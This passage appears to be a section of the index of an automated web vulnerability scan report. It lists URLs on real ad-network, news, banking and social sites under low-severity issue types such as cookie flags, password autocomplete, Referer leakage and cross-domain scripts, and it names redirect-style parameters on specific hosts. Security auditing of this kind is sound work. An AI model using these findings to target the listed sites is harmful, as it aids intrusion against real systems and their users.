12.6. http://mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com/ps/ifr
12.7. http://nai.ad.us-ec.adtechus.com/nai/daa.php
12.8. http://nai.adserver.adtechus.com/nai/daa.php
12.9. http://nai.adserverec.adtechus.com/nai/daa.php
12.10. http://nai.adserverwc.adtechus.com/nai/daa.php
12.11. http://nai.adsonar.com/nai/daa.php
12.12. http://nai.adtech.de/nai/daa.php
12.13. http://nai.advertising.com/nai/daa.php
12.14. http://nai.glb.adtechus.com/nai/daa.php
12.15. http://nai.tacoda.at.atwola.com/nai/daa.php
12.17. http://www.amazon.com/dp/0307387178
12.18. http://www.amazon.com/dp/B000QRIGLW
12.19. http://www.amazon.com/dp/B002Y27P3M
12.20. http://www.amazon.com/dp/B004DERF5M
12.21. http://www.asaservers.com/showpages.asp
12.22. http://www.facebook.com/extern/login_status.php
12.23. http://www.networkadvertising.org/managing/optout_results.asp
12.24. http://www.networkadvertising.org/yahoo_handler
13.1. https://market.android.com/
13.2. https://adwords.google.com/
13.4. https://docs.google.com/
13.5. https://mail.google.com/
13.6. https://maps-api-ssl.google.com/
13.7. https://sites.google.com/
13.10. https://www.gotomeeting.com/
14.1. http://a.tribalfusion.com/z/i.optout [success parameter]
14.2. http://a1.interclick.com/CookieCheck.aspx [hasCookies parameter]
14.3. http://a1.interclick.com/optOut.aspx [fail parameter]
14.5. http://cmap.am.ace.advertising.com/amcm.ashx [admeld_callback parameter]
14.6. http://i.w55c.net/ping_match.gif [rurl parameter]
14.7. http://ib.adnxs.com/getuid [name of an arbitrarily supplied request parameter]
14.8. http://ib.adnxs.com/getuidnb [name of an arbitrarily supplied request parameter]
14.9. http://ib.adnxs.com/mapuid [redir parameter]
14.10. http://login.dotomi.com/ucm/UCMController [redir_url parameter]
14.11. http://nai.ad.us-ec.adtechus.com/nai/daa.php [rd parameter]
14.12. http://nai.adserver.adtechus.com/nai/daa.php [rd parameter]
14.13. http://nai.adserverec.adtechus.com/nai/daa.php [rd parameter]
14.14. http://nai.adserverwc.adtechus.com/nai/daa.php [rd parameter]
14.15. http://nai.adsonar.com/nai/daa.php [rd parameter]
14.16. http://nai.adtech.de/nai/daa.php [rd parameter]
14.17. http://nai.advertising.com/nai/daa.php [rd parameter]
14.18. http://nai.glb.adtechus.com/nai/daa.php [rd parameter]
14.19. http://nai.tacoda.at.atwola.com/nai/daa.php [rd parameter]
14.22. http://optout.crwdcntrl.net/optout [d parameter]
14.23. http://pixel.quantserve.com/pixel/p-7bFjjs2q00gK6.gif [redirecturl parameter]
14.24. http://privacy.revsci.net/optout/optoutv.aspx [p parameter]
14.25. http://r.pixel.trafficmp.com/a/bpix [r parameter]
14.26. http://s.ixiaa.com/digi/74FD3F27-87A5-4623-80C8-AB4ED16EB84F/a.gif [redirect parameter]
14.27. http://s.ixiaa.com/digi/DE1758AD-D3EC-426B-A4FB-71459A973A0C/a.gif [redirect parameter]
14.28. http://sync.mathtag.com/sync/img [redir parameter]
14.29. http://t.mookie1.com/t/v1/event [migDest parameter]
14.30. http://t4.liverail.com/ [redirect parameter]
14.31. http://www.dnaindia.com/redirect [name of an arbitrarily supplied request parameter]
14.32. http://www.wtp101.com/casale_sync [cm_callback_url parameter]
15. Cookie scoped to parent domain
15.3. http://msite.martiniadnetwork.com/index/
15.4. http://optout.mookie1.com/optout/nai/
15.5. http://search.spotxchange.com/vast/2.00/75606
15.8. http://www.amazon.com/dp/0307387178
15.9. http://www.amazon.com/dp/B000QRIGLW
15.10. http://www.amazon.com/dp/B002Y27P3M
15.11. http://www.amazon.com/dp/B004DERF5M
15.12. http://www.timesjobs.com/candidate/job-search.html
15.13. http://a.collective-media.net/optout
15.14. http://a.netmng.com/opt-out.php
15.15. http://a.rfihub.com/nai_opt_out_1.gif
15.16. http://a.tribalfusion.com/displayAd.js
15.17. http://a.tribalfusion.com/i.optout
15.18. http://a.tribalfusion.com/j.ad
15.19. http://a.tribalfusion.com/z/i.optout
15.21. http://ad.turn.com/server/ads.js
15.22. http://ad.turn.com/server/pixel.htm
15.24. http://ads.amgdgt.com/ads/opt-out
15.31. https://adwords.google.com/um/StartNewLogin
15.32. http://ak1.abmr.net/is/r1-ads.ace.advertising.com
15.33. http://api.aggregateknowledge.com/optout2
15.34. http://api.agkn.com/optout2
15.35. http://as.casalemedia.com/j
15.36. http://ats.tumri.net/ats/optout
15.37. http://avn.innity.com/view/3898/35480/0/1315103295564
15.38. http://b.scorecardresearch.com/b
15.39. http://b.scorecardresearch.com/p
15.40. http://bh.contextweb.com/bh/rtset
15.41. http://bid.openx.net/json
15.42. http://c7.zedo.com/img/bh.gif
15.43. http://cas.criteo.com/delivery/afr.php
15.44. http://clk.atdmt.com/MRT/go/343014976/direct
15.45. http://clk.atdmt.com/goiframe/171946551/278612752/direct
15.46. http://clk.fetchback.com/serve/fb/click
15.47. http://d7.zedo.com/OzoDB/cutils/R53_7/jsc/1302/egc.js
15.48. http://d7.zedo.com/OzoDB/cutils/R53_7/jsc/933/egc.js
15.49. http://d7.zedo.com/OzoDB/cutils/R53_7_5/jsc/767/egc.js
15.50. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js
15.51. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js
15.52. http://d7.zedo.com/bar/v16-504/d2/jsc/gl.js
15.53. http://d7.zedo.com/bar/v16-504/d3/jsc/gl.js
15.54. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js
15.55. http://d7.zedo.com/img/bh.gif
15.56. http://d7.zedo.com/utils/ecSet.js
15.57. http://developers.facebook.com/plugins/
15.58. http://dis.sv.us.criteo.com/dis/dis.aspx
15.59. http://dp.33across.com/ps/
15.60. http://i.w55c.net/ping_match.gif
15.62. http://ib.adnxs.com/getuid
15.63. http://ib.adnxs.com/getuidnb
15.64. http://ib.adnxs.com/mapuid
15.65. http://ib.adnxs.com/pxj
15.66. http://idcs.interclick.com/Segment.aspx
15.67. http://image2.pubmatic.com/AdServer/Pug
15.68. http://img.pulsemgr.com/optout
15.69. http://imp.fetchback.com/serve/fb/adtag.js
15.70. http://imp.fetchback.com/serve/fb/hover
15.71. http://imp.fetchback.com/serve/fb/imp
15.72. http://load.exelator.com/load/
15.73. http://load.exelator.com/load/
15.74. http://load.exelator.com/load/OptOut.php
15.75. http://nai.btrll.com/nai/optout
15.76. http://notrack.adviva.net/CookieCheck.php
15.77. http://notrack.specificclick.net/CookieCheck.php
15.78. http://notrack.specificmedia.com/CookieCheck.php
15.80. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1343751177@Top
15.81. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1442444284@Top
15.82. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1886024182@x96
15.83. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1995720457@Top
15.84. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1995720457@x96
15.85. http://oo.afy11.net/NAIOptOut.aspx
15.86. http://optimized-by.rubiconproject.com/a/4642/5271/7551-15.js
15.87. http://optout.33across.com/api/
15.88. http://optout.adlegend.com/nai/optout.php
15.89. http://optout.crwdcntrl.net/optout
15.90. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl
15.91. http://optout.imiclk.com/cgi/optout.cgi
15.92. http://optout.mookie1.decdna.net/optout/nai/
15.93. http://optout.mookie1.decideinteractive.com/optout/nai/
15.94. http://optout.mookie1.pm14.com/optout/nai/
15.95. http://optout.mxptint.net/naioptout.ashx
15.96. http://optout.xgraph.net/optout.gif.jsp
15.97. http://p.brilig.com/contact/optout
15.98. http://pbid.pro-market.net/engine
15.99. http://phoenix.untd.com/TRCK/RGST
15.100. http://picasaweb.google.com/lh/view
15.101. http://pixel.33across.com/ps/
15.102. http://pixel.adblade.com/imps.php
15.103. http://pixel.fetchback.com/serve/fb/optout
15.104. http://pixel.quantserve.com/optout_set
15.105. http://pixel.rubiconproject.com/tap.php
15.106. http://pixel.rubiconproject.com/tap.php
15.107. http://pixel.rubiconproject.com/tap.php
15.108. http://pixel.rubiconproject.com/tap.php
15.109. http://pixel.rubiconproject.com/tap.php
15.110. http://pixel.traveladvertising.com/Live/Pixel.aspx
15.111. http://plg3.yumenetworks.com/dynamic_preroll_playlist.vast2xml
15.112. http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s82023671451024
15.113. http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s85326054897159
15.114. http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s8630611889064
15.115. http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s88864460214972
15.116. http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s88942754534073
15.117. http://privacy.revsci.net/optout/optout.aspx
15.118. http://profile.live.com/badge
15.119. http://px.owneriq.net/naioptout
15.120. http://r.casalemedia.com/rum
15.121. http://r.openx.net/set
15.122. http://r.pixel.trafficmp.com/a/bpix
15.123. http://r.turn.com/r/bd
15.124. http://r.turn.com/r/beacon
15.130. http://rp.gwallet.com/r1/optout
15.131. http://rs.gwallet.com/r1/pixel/x420r5261063
15.132. http://rs.gwallet.com/r1/pixel/x420r9614074
15.133. http://s.amazon-cornerstone.com/iu3
15.134. http://s.xp1.ru4.com/coop
15.135. http://search.spotxchange.com/partner
15.136. http://srv.clickfuse.com/pixels/create.php
15.137. http://sync.mathtag.com/sync/img
15.138. http://t.mookie1.com/t/v1/event
15.139. http://t4.liverail.com/
15.140. http://tags.bluekai.com/site/2688
15.141. http://tags.bluekai.com/site/353
15.142. http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/
15.143. http://trk.tidaltv.com/ILogger.aspx
15.144. http://uav.tidaltv.com/3PDPHandler.aspx
15.145. http://www.adadvisor.net/nai/optout
15.146. http://www.adbrite.com/mb/nai_optout.php
15.147. http://www.addthis.com/api/nai/optout
15.148. http://www.bangkokpost.com/classified/ucp.php
15.149. http://www.bangkokpost.com/classified/viewforum.php
15.150. http://www.bangkokpost.com/forum/search.php
15.151. http://www.bizographics.com/nai/optout
15.152. http://www.burstnet.com/cgi-bin/opt_out.cgi
15.153. http://www.facebook.com/campaign/landing.php
15.154. http://www.facebook.com/pages/Friends-of-The-Nation/147232991936
15.155. http://www.google.com/reader/view/
15.156. http://www.mediaplex.com/optout_pure.php
15.157. http://www.mediaplex.com/optout_pure.php
15.158. http://www.nexac.com/nai_optout.php
15.159. http://www.wtp101.com/casale_sync
15.160. http://www.wtp101.com/pull_sync
15.161. http://www.youtube.com/results
15.162. http://www.youtube.com/watch
15.163. http://www9.effectivemeasure.net/v4/em_dimg
15.164. http://www9.effectivemeasure.net/v4/em_js
16. Cookie without HttpOnly flag set
16.1. http://223.165.24.159/toiwidget/jsp/widget.jsp
16.3. http://nai.ad.us-ec.adtechus.com/nai/daa.php
16.4. http://nai.adserver.adtechus.com/nai/daa.php
16.5. http://nai.adserverec.adtechus.com/nai/daa.php
16.6. http://nai.adserverwc.adtechus.com/nai/daa.php
16.7. http://nai.adsonar.com/nai/daa.php
16.8. http://nai.adtech.de/nai/daa.php
16.9. http://nai.advertising.com/nai/daa.php
16.10. http://nai.glb.adtechus.com/nai/daa.php
16.11. http://nai.tacoda.at.atwola.com/nai/daa.php
16.12. http://optout.mookie1.com/optout/nai/
16.13. http://pixel.adsafeprotected.com/jspix
16.14. http://search.spotxchange.com/vast/2.00/75606
16.15. http://shopping.indiatimes.com/ism/faces/tracker.jsp
16.16. http://tag.admeld.com/nai-opt-out
16.17. http://thestar.com.my/news/story.asp
16.18. http://tweetmeme.com/auth/login
16.19. http://twitterapi.indiatimes.com/feedtweet/tweet
16.21. http://www.amazon.com/b
16.22. http://www.amazon.com/dp/0307387178
16.23. http://www.amazon.com/dp/B000QRIGLW
16.24. http://www.amazon.com/dp/B002Y27P3M
16.25. http://www.amazon.com/dp/B004DERF5M
16.26. http://www.godaddy.com/gdshop/ssl/ssl.asp
16.27. http://www.magicbricks.com/bricks/viewProperty.html
16.28. http://www.scb.co.th/scb_api/api_a_deposit.jsp
16.29. http://www.scb.co.th/scb_api/scbapi.jsp
16.30. http://www.simplymarry.com/timesmatri/faces/jsp/profileDisplay.jsp
16.31. http://www.simplymarry.com/timesmatri/faces/jsp/searchResult.photo
16.32. http://www.timesjobs.com/candidate/job-search.html
16.33. http://a.collective-media.net/optout
16.34. http://a.netmng.com/opt-out.php
16.35. http://a.rfihub.com/nai_opt_out_1.gif
16.36. http://a.tribalfusion.com/displayAd.js
16.37. http://a.tribalfusion.com/i.optout
16.38. http://a.tribalfusion.com/j.ad
16.39. http://a.tribalfusion.com/z/i.optout
16.40. http://ad.360yield.com/match
16.42. http://ad.turn.com/server/ads.js
16.43. http://ad.turn.com/server/pixel.htm
16.44. http://ad.yieldmanager.com/imp
16.45. http://ad.yieldmanager.com/pixel
16.46. http://admonkey.dapper.net/PixelMonkey
16.47. http://ads.amgdgt.com/ads/opt-out
16.62. http://ads.indiatimes.com/ads.dll/genptypead
16.63. http://ads.reach360ads.com/www/ads/ad_log.php
16.64. http://ads.reach360ads.com/www/ads/click.php
16.65. http://ads.reach360ads.com/www/ads/iframe.php
16.66. http://ads3.bangkokpost.co.th/www/delivery/spc.php
16.67. http://adssrv.nationmultimedia.com/adlog.php
16.74. https://adwords.google.com/um/StartNewLogin
16.75. http://ak1.abmr.net/is/r1-ads.ace.advertising.com
16.76. http://api.aggregateknowledge.com/optout2
16.77. http://api.agkn.com/optout2
16.78. http://as.casalemedia.com/j
16.79. http://ats.tumri.net/ats/optout
16.80. http://avn.innity.com/view/3898/35480/0/1315103295564
16.81. http://b.scorecardresearch.com/b
16.82. http://b.scorecardresearch.com/p
16.83. http://bh.contextweb.com/bh/rtset
16.84. http://bid.openx.net/json
16.85. http://c7.zedo.com/img/bh.gif
16.86. http://cas.criteo.com/delivery/afr.php
16.87. http://cdn4.specificclick.net/optout.php
16.88. http://clk.atdmt.com/MRT/go/343014976/direct
16.89. http://clk.atdmt.com/goiframe/171946551/278612752/direct
16.90. http://clk.fetchback.com/serve/fb/click
16.91. http://cms.ad.yieldmanager.net/v1/cms
16.92. http://d.tradex.openx.com/afr.php
16.93. http://d.tradex.openx.com/ck.php
16.94. http://d.tradex.openx.com/lg.php
16.95. http://d7.zedo.com/OzoDB/cutils/R53_7/jsc/1302/egc.js
16.96. http://d7.zedo.com/OzoDB/cutils/R53_7/jsc/933/egc.js
16.97. http://d7.zedo.com/OzoDB/cutils/R53_7_5/jsc/767/egc.js
16.98. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js
16.99. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js
16.100. http://d7.zedo.com/bar/v16-504/d2/jsc/gl.js
16.101. http://d7.zedo.com/bar/v16-504/d3/jsc/gl.js
16.102. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js
16.103. http://d7.zedo.com/img/bh.gif
16.104. http://d7.zedo.com/utils/ecSet.js
16.105. http://d7.zedo.com/utils/ecSet.js
16.106. http://developers.facebook.com/plugins/
16.107. http://dis.sv.us.criteo.com/dis/dis.aspx
16.108. http://domdex.com/nai_optout.php
16.109. http://dp.33across.com/ps/
16.110. http://i.w55c.net/ping_match.gif
16.111. http://idcs.interclick.com/Segment.aspx
16.112. http://idiva.com/index.php
16.113. http://image2.pubmatic.com/AdServer/Pug
16.114. http://img.pulsemgr.com/optout
16.115. http://imp.fetchback.com/serve/fb/adtag.js
16.116. http://imp.fetchback.com/serve/fb/hover
16.117. http://imp.fetchback.com/serve/fb/imp
16.118. http://load.exelator.com/load/
16.119. http://load.exelator.com/load/
16.120. http://load.exelator.com/load/OptOut.php
16.121. http://lvs.truehits.in.th/goggen.php
16.122. http://nai.btrll.com/nai/optout
16.123. http://netspiderads2.indiatimes.com/ads.dll/getad
16.124. http://netspiderads2.indiatimes.com/ads.dll/getxmlad
16.125. http://notrack.adviva.net/CookieCheck.php
16.126. http://notrack.specificclick.net/CookieCheck.php
16.127. http://notrack.specificmedia.com/CookieCheck.php
16.129. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1343751177@Top
16.130. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1442444284@Top
16.131. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1886024182@x96
16.132. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1995720457@Top
16.133. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1995720457@x96
16.134. http://oo.afy11.net/NAIOptOut.aspx
16.135. http://optimized-by.rubiconproject.com/a/4642/5271/7551-15.js
16.136. http://optout.33across.com/api/
16.137. http://optout.adlegend.com/nai/optout.php
16.138. http://optout.crwdcntrl.net/optout
16.139. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl
16.140. http://optout.imiclk.com/cgi/optout.cgi
16.141. http://optout.mookie1.decdna.net/optout/nai/
16.142. http://optout.mookie1.decideinteractive.com/optout/nai/
16.143. http://optout.mookie1.pm14.com/optout/nai/
16.144. http://optout.mxptint.net/naioptout.ashx
16.145. http://optout.xgraph.net/optout.gif.jsp
16.146. http://p.brilig.com/contact/optout
16.147. http://pbid.pro-market.net/engine
16.148. http://phoenix.untd.com/TRCK/RGST
16.149. http://pixel.33across.com/ps/
16.150. http://pixel.adblade.com/imps.php
16.151. http://pixel.fetchback.com/serve/fb/optout
16.152. http://pixel.quantserve.com/optout_set
16.153. http://pixel.rubiconproject.com/tap.php
16.154. http://pixel.rubiconproject.com/tap.php
16.155. http://pixel.rubiconproject.com/tap.php
16.156. http://pixel.rubiconproject.com/tap.php
16.157. http://pixel.rubiconproject.com/tap.php
16.158. http://pixel.traveladvertising.com/Live/Pixel.aspx
16.159. http://plg3.yumenetworks.com/dynamic_preroll_playlist.vast2xml
16.160. http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s82023671451024
16.161. http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s85326054897159
16.162. http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s8630611889064
16.163. http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s8630611889064
16.164. http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s88864460214972
16.165. http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s88942754534073
16.166. http://privacy.revsci.net/optout/optout.aspx
16.167. http://profile.live.com/badge
16.168. http://property.ndtv.com/ndtv_redirect.php
16.169. http://px.owneriq.net/naioptout
16.170. http://r.casalemedia.com/rum
16.171. http://r.openx.net/set
16.172. http://r.pixel.trafficmp.com/a/bpix
16.173. http://r.turn.com/r/bd
16.174. http://r.turn.com/r/beacon
16.180. http://rp.gwallet.com/r1/optout
16.181. http://rs.gwallet.com/r1/pixel/x420r5261063
16.182. http://rs.gwallet.com/r1/pixel/x420r9614074
16.183. http://s.amazon-cornerstone.com/iu3
16.184. http://s.xp1.ru4.com/coop
16.185. http://search.spotxchange.com/partner
16.186. http://srv.clickfuse.com/pixels/create.php
16.187. http://sync.mathtag.com/sync/img
16.188. http://t.mookie1.com/t/v1/event
16.189. http://t4.liverail.com/
16.190. http://tag.admeld.com/nai-status
16.191. http://tag.admeld.com/nai-test-opt-out
16.192. http://tags.bluekai.com/site/2688
16.193. http://tags.bluekai.com/site/353
16.194. http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/
16.195. http://timeslog.indiatimes.com/timeslog.dll/topcnt
16.196. http://trk.tidaltv.com/ILogger.aspx
16.197. http://uav.tidaltv.com/3PDPHandler.aspx
16.198. http://unitus.synergy-e.com/www/delivery/ajs.php
16.199. http://unitus.synergy-e.com/www/delivery/ck.php
16.200. http://unitus.synergy-e.com/www/delivery/lg.php
16.201. http://unitus.synergy-e.com/www/delivery/spc.php
16.202. http://web.adblade.com/impsc.php
16.203. http://www.adadvisor.net/nai/optout
16.204. http://www.adbrite.com/mb/nai_optout.php
16.205. http://www.addthis.com/api/nai/optout
16.206. http://www.bangkokpost.com/
16.207. http://www.bizographics.com/nai/optout
16.208. http://www.burstnet.com/cgi-bin/opt_out.cgi
16.209. http://www.emirates.com/us/english/index.aspx
16.210. http://www.facebook.com/pages/Friends-of-The-Nation/147232991936
16.211. http://www.google.com/reader/view/
16.212. http://www.mediaplex.com/optout_pure.php
16.213. http://www.mediaplex.com/optout_pure.php
16.214. http://www.nexac.com/nai_optout.php
16.215. http://www.wtp101.com/casale_sync
16.216. http://www.wtp101.com/pull_sync
16.217. http://www.youtube.com/results
16.218. http://www.youtube.com/watch
16.219. http://www.ztsystems.com/Default.aspx
16.220. http://www9.effectivemeasure.net/v4/em_dimg
16.221. http://www9.effectivemeasure.net/v4/em_js
17. Password field with autocomplete enabled
17.1. http://member.bangkokpost.com/login.php
17.2. http://ndtvjobs.bixee.com/search/search/
17.3. http://truehits.net/stat.php
17.7. http://twitter.com/search
17.8. https://www.google.com/accounts/ServiceLogin
19.1. http://ads.indiatimes.com/Default.aspx
19.2. http://tidaltv.com/Default.aspx
19.3. http://www.modestogov.com/Default.aspx
19.4. http://www.newspaperdirect.com/Default.aspx
19.5. http://www.tidaltv.com/Default.aspx
20. Referer-dependent response
20.1. http://a.collective-media.net/optout
20.2. http://ads.amgdgt.com/ads/opt-out
20.3. http://ats.tumri.net/ats/optout
20.4. http://d.tradex.openx.com/afr.php
20.5. http://optout.collective-media.net/optout/status
20.6. http://pixel.adsafeprotected.com/jspix
20.7. http://timeslog.indiatimes.com/timeslog.dll/topcnt
20.8. http://www.connect.facebook.com/widgets/fan.php
20.9. http://www.facebook.com/plugins/like.php
21. Cross-domain Referer leakage
21.1. http://223.165.24.159/toiwidget/jsp/widget.jsp
21.2. http://a1.interclick.com/CookieCheck.aspx
21.3. http://a1.interclick.com/optOut.aspx
21.4. http://ad-apac.doubleclick.net/adi/N5840.139243.NATIONMULTIMEDIA.CO/B4833719.2
21.5. http://ad.doubleclick.net/adi/N6296.126265.CASALE/B5641720.250
21.6. http://ad.doubleclick.net/adi/N6296.126265.CASALE/B5641720.306
21.7. http://ad.yieldmanager.com/pixel
21.8. http://ads.bluelithium.com/st
21.9. http://ads.reach360ads.com/www/ads/iframe.php
21.10. http://adserver.adtechus.com/addyn/3.0/5132/1305477/0/170/ADTECH
21.18. http://advertising.aol.com/nai/nai.php
21.19. http://advertising.aol.com/nai/nai.php
21.20. http://advertising.aol.com/nai/nai.php
21.21. http://api.tweetmeme.com/v2/follow.js
21.22. http://as.casalemedia.com/j
21.23. http://as.casalemedia.com/j
21.24. http://as.serving-sys.com/OptOut/nai_optout.aspx
21.25. http://as.serving-sys.com/OptOut/nai_optout_results.aspx
21.26. http://as.serving-sys.com/OptOut/nai_optout_results.aspx
21.27. http://cas.criteo.com/delivery/afr.php
21.28. http://cdn.ndtv.com/static/js/jquery_tool_min-1.1.2.js
21.29. http://choice.atdmt.com/AdvertisementChoice/opt.out
21.30. http://choice.atdmt.com/AdvertisementChoice/opt.out
21.31. http://choice.atdmt.com/AdvertisementChoice/opt.out
21.32. http://choice.bing.com/AdvertisementChoice/opt.out
21.33. http://choice.bing.com/AdvertisementChoice/opt.out
21.34. http://choice.bing.com/AdvertisementChoice/opt.out
21.35. http://choice.live.com/AdvertisementChoice/opt.out
21.36. http://choice.live.com/AdvertisementChoice/opt.out
21.37. http://choice.live.com/AdvertisementChoice/opt.out
21.38. http://choice.live.com/AdvertisementChoice/opt.out
21.39. http://choice.microsoft.com/AdvertisementChoice/opt.out
21.40. http://choice.microsoft.com/AdvertisementChoice/opt.out
21.41. http://choice.microsoft.com/AdvertisementChoice/opt.out
21.42. http://choice.msn.com/AdvertisementChoice/opt.out
21.43. http://choice.msn.com/AdvertisementChoice/opt.out
21.44. http://choice.msn.com/AdvertisementChoice/opt.out
21.45. http://choice.msn.com/AdvertisementChoice/opt.out
21.46. http://cm.g.doubleclick.net/pixel
21.47. http://cm.g.doubleclick.net/pixel
21.48. http://cms.ad.yieldmanager.net/v1/cms
21.49. http://core.videoegg.com/eap/14533/html/jstags.html
21.50. http://core.videoegg.com/eap/latest/html/jstags.html
21.51. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js
21.52. http://dis.criteo.com/dis/optoutstatus.aspx
21.53. http://dis.criteo.com/dis/optoutstatus.aspx
21.54. http://edge.aperture.displaymarketplace.com/anotnai.gif
21.55. http://edge.aperture.displaymarketplace.com/anotnaistat.gif
21.56. http://edge.aperture.displaymarketplace.com/anotnaistat.gif
21.57. http://feed.mikle.com/feeds/rssmikle.cgi
21.58. http://googleads.g.doubleclick.net/pagead/ads
21.59. http://googleads.g.doubleclick.net/pagead/ads
21.60. http://googleads.g.doubleclick.net/pagead/ads
21.61. http://googleads.g.doubleclick.net/pagead/ads
21.63. http://img.pulsemgr.com/optout
21.64. http://img.pulsemgr.com/optout
21.65. http://img.pulsemgr.com/optout
21.66. http://imp.fetchback.com/serve/fb/imp
21.67. http://info.yahoo.com/nai/nai-status.html
21.68. http://mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com/gadgets/ifr
21.69. http://media.fastclick.net/nai/remove
21.70. http://media.fastclick.net/nai/verify
21.71. http://netspiderads2.indiatimes.com/ads.dll/getad
21.72. http://netspiderads2.indiatimes.com/ads.dll/getad
21.74. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1886024182@x96
21.75. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1995720457@x96
21.76. http://oo.afy11.net/NAIIsOptOut.aspx
21.77. http://oo.afy11.net/NAIIsOptOut.aspx
21.78. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl
21.79. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl
21.80. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl
21.81. http://optout.ib-ibi.com:8000/VerifyCookieStatus.aspx
21.82. http://optout.mxptint.net/naistatus.ashx
21.84. http://rcm.amazon.com/e/cm
21.85. http://rcm.amazon.com/e/cm
21.86. http://rcm.amazon.com/e/cm
21.87. http://rcm.amazon.com/e/cm
21.88. http://rcm.amazon.com/e/cm
21.89. http://rcm.amazon.com/e/cm
21.90. http://social.ndtv.com/static/Comment/Form/
21.91. http://tag.admeld.com/nai-status
21.92. http://tag.admeld.com/nai-status
21.93. http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html
21.94. http://timesofindia.indiatimes.com/newtoolbar/9855193.cms
21.95. http://timesofindia.indiatimes.com/toitopics_callbybing.cms
21.96. http://timesofindia.indiatimes.com/toitopics_callbybing.cms
21.97. http://timesofindia.indiatimes.com/toitopics_googleads.cms
21.98. http://uav.tidaltv.com/3PDPHandler.aspx
21.99. http://uav.tidaltv.com/3PDPHandler.aspx
21.100. http://web.adblade.com/impsc.php
21.101. http://www.connect.facebook.com/widgets/fan.php
21.102. http://www.facebook.com/plugins/recommendations.php
21.103. http://www.google.com/cse
21.104. http://www.google.com/search
21.105. http://www.google.com/url
21.106. http://www.google.com/url
21.107. http://www.google.com/url
21.108. http://www.mathtag.com/cgi-bin/optout
21.109. http://www.mathtag.com/cgi-bin/optout
21.110. http://www.networkadvertising.org/yahoo_handler
21.111. http://www.pulse360.com/behavior/nai-opt-out.html
21.112. http://www.pulse360.com/behavior/nai-opt-out.html
21.113. http://www.tidaltv.com/optout/status.ashx
21.114. http://www.tidaltv.com/optout/verfiyoptout.ashx
21.115. http://www.tribalfusion.com/optout/verify.js
22. Cross-domain script include
22.1. http://ad-apac.doubleclick.net/adi/N5840.139243.NATIONMULTIMEDIA.CO/B4833719.2
22.2. http://ad.doubleclick.net/adi/N6296.126265.CASALE/B5641720.250
22.3. http://ad.doubleclick.net/adi/N6296.126265.CASALE/B5641720.306
22.11. https://asia.citi.com/india/rca/send_money_to_india.htm
22.12. http://core.videoegg.com/eap/14533/html/jstags.html
22.13. http://core.videoegg.com/eap/latest/html/jstags.html
22.14. http://cps.regis.edu/lp/computer_degree/it_degree.php
22.15. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js
22.16. http://googleads.g.doubleclick.net/pagead/ads
22.17. http://hits.truehits.in.th/data/c0002761.js
22.18. http://idiva.com/index.php
22.19. http://mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com/gadgets/ifr
22.20. http://media1.bangkokpost.com/ads/Innity/030911TourismMalaysia728x90.html
22.21. http://member.bangkokpost.com/login.php
22.22. http://ndtvjobs.bixee.com/search/search/
22.23. http://netspiderads2.indiatimes.com/ads.dll/getad
22.25. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1343751177@Top
22.26. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1886024182@Top
22.27. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1995720457@Top
22.29. http://social.ndtv.com/NDTVProfit
22.30. http://social.ndtv.com/groups.php
22.31. http://social.ndtv.com/home.php
22.32. http://social.ndtv.com/static/Comment/Form/
